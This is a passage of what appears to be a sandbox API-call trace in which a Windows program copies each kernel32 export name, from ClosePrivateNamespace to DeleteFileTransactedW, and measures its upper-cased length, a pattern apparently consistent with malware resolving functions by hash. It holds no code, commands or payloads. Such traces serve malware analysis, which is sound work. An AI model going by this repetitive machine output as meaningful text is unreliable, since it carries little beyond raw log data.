lstrcpyA (in: lpString1=0x31cec6c, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0178.987] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0178.987] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0178.987] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0178.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0178.987] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0178.987] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0178.987] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0178.987] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0178.988] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0178.988] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0178.988] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0178.988] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0178.988] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0178.988] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0178.988] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0178.988] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0178.988] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0178.988] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0178.988] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0178.988] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0178.988] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0178.988] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0178.988] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0178.988] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0178.988] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0178.988] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0178.989] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0178.989] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0178.989] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0178.989] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0178.989] lstrlenA (lpString="COPYCONTEXT") returned 11 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0178.989] lstrlenA (lpString="COPYFILEA") returned 9 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0178.989] lstrlenA (lpString="COPYFILEEXA") returned 11 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0178.989] lstrlenA (lpString="COPYFILEEXW") returned 11 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0178.989] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0178.989] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0178.989] lstrlenA (lpString="COPYFILEW") returned 9 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0178.989] lstrlenA (lpString="COPYLZFILE") returned 10 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0178.989] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0178.989] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0178.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0178.989] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0178.989] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0178.989] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0178.989] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0178.989] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0178.990] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0178.990] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0178.990] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0178.990] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0178.990] lstrlenA (lpString="CREATEEVENTA") returned 12 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0178.990] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0178.990] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0178.990] lstrlenA (lpString="CREATEEVENTW") returned 12 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0178.990] lstrlenA (lpString="CREATEFIBER") returned 11 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0178.990] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0178.990] lstrlenA (lpString="CREATEFILEA") returned 11 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0178.990] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0178.990] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0178.990] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0178.990] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0178.990] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0178.990] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0178.990] lstrlenA (lpString="CREATEFILEW") returned 11 [0178.990] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0178.990] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0178.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0178.991] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0178.991] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0178.991] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0178.991] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0178.991] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0178.991] lstrlenA (lpString="CREATEJOBSET") returned 12 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0178.991] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0178.991] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0178.991] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0178.991] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0178.991] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0178.991] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0178.991] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0178.991] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0178.991] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0178.991] lstrlenA (lpString="CREATEPIPE") returned 10 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0178.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0178.991] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0178.991] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0178.992] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0178.992] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0178.992] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0178.992] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0178.992] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0178.992] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0178.992] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0178.992] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0178.992] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0178.992] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0178.992] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0178.992] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0178.992] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0178.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0178.992] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0178.992] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0178.992] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0178.992] lstrlenA (lpString="CREATETHREAD") returned 12 [0178.992] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0178.993] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0178.993] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0178.993] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0178.993] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0178.993] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0178.993] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0178.993] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0178.993] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0178.993] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0178.993] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0178.993] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0178.993] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0178.993] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0178.993] lstrlenA (lpString="CTRLROUTINE") returned 11 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0178.993] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0178.993] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0178.993] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0178.993] lstrlenA (lpString="DEBUGBREAK") returned 10 [0178.993] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0178.993] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0178.994] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0178.994] lstrlenA (lpString="DECODEPOINTER") returned 13 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0178.994] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0178.994] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0178.994] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0178.994] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0178.994] lstrlenA (lpString="DELETEATOM") returned 10 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0178.994] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0178.994] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0178.994] lstrlenA (lpString="DELETEFIBER") returned 11 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0178.994] lstrlenA (lpString="DELETEFILEA") returned 11 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0178.994] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0178.994] lstrcpyA (in: lpString1=0x31cec6c, lpString2="DeleteFileTransactedW" 